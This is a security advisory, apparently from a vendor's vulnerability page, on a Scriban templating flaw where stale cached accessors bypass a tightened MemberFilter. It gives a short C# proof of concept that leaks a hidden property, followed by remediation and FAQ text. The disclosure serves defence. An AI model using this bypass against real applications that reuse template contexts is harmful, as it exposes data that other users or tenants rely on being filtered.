Summary
TemplateContext caches type accessors by Type only, but those accessors are built using the current MemberFilter and MemberRenamer. When a TemplateContext is reused and the filter is tightened for a later render, Scriban still reuses the old accessor and continues exposing members that should now be hidden.
Details
The relevant code path is:
TemplateContext.GetMemberAccessor()caches accessors in_memberAccessorsbyTypeinsrc/Scriban/TemplateContext.cslines 850–863.- For plain .NET objects,
GetMemberAccessorImpl()creates a newTypedObjectAccessor(type, _keyComparer, MemberFilter, MemberRenamer)insrc/Scriban/TemplateContext.cslines 909–939. TypedObjectAccessorstores the current filter and precomputes the exposed member set in its constructor andPrepareMembers()insrc/Scriban/Runtime/Accessors/TypedObjectAccessor.cslines 33–40 and 119–179.- Member access later goes through
ScriptMemberExpression.GetValue()insrc/Scriban/Syntax/Expressions/ScriptMemberExpression.cslines 67–95, which uses the cached accessor. TemplateContext.Reset()does not clear_memberAccessorsinsrc/Scriban/TemplateContext.cslines 877–902.
As a result, once a permissive accessor has been created for a given type, changing TemplateContext.MemberFilter later does not take effect for that type on the same reused context.
This is especially relevant because the Scriban docs explicitly recommend TemplateContext.MemberFilter for indirect .NET object exposure.
Proof of Concept
Setup
mkdir scriban-poc2
cd scriban-poc2
dotnet new console --framework net8.0
dotnet add package Scriban --version 6.6.0
Program.cs
using System.Reflection;
using Scriban;
using Scriban.Runtime;
var template = Template.Parse("{{ model.secret }}");
var context = new TemplateContext
{
EnableRelaxedMemberAccess = false
};
var globals = new ScriptObject();
globals["model"] = new SensitiveModel();
context.PushGlobal(globals);
context.MemberFilter = _ => true;
Console.WriteLine("first=" + template.Render(context));
context.Reset();
var globals2 = new ScriptObject();
globals2["model"] = new SensitiveModel();
context.PushGlobal(globals2);
context.MemberFilter = member => member.Name == nameof(SensitiveModel.Public);
Console.WriteLine("second=" + template.Render(context));
sealed class SensitiveModel
{
public string Public => "ok";
public string Secret => "leaked";
}
Run
dotnet run
Actual Output
first=leaked
second=leaked
Expected Behavior
The second render should fail or stop exposing Secret, because the filter only allows Public and EnableRelaxedMemberAccess is disabled.
This reproduces a direct filter bypass caused by the stale cached accessor.
Impact
This is a protection-mechanism bypass. Applications that use TemplateContext.MemberFilter as part of their sandbox or object-exposure policy can unintentionally expose hidden members across requests when they reuse a TemplateContext.
The impact includes:
- Unauthorized read access to filtered properties or fields
- Unauthorized writes if the filtered member also has a setter
- Policy bypass across requests, users, or tenants when contexts are pooled
GHSA-5WR9-M6JW-XX44 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (7.0.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-5WR9-M6JW-XX44? GHSA-5WR9-M6JW-XX44 is a critical-severity security vulnerability in scriban (nuget), affecting versions < 7.0.0. It is fixed in 7.0.0.
- How severe is GHSA-5WR9-M6JW-XX44? GHSA-5WR9-M6JW-XX44 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of scriban are affected by GHSA-5WR9-M6JW-XX44? scriban (nuget) versions < 7.0.0 is affected.
- Is there a fix for GHSA-5WR9-M6JW-XX44? Yes. GHSA-5WR9-M6JW-XX44 is fixed in 7.0.0. Upgrade to this version or later.
- Is GHSA-5WR9-M6JW-XX44 exploitable, and should I be worried? Whether GHSA-5WR9-M6JW-XX44 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-5WR9-M6JW-XX44 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-5WR9-M6JW-XX44? Upgrade
scribanto 7.0.0 or later.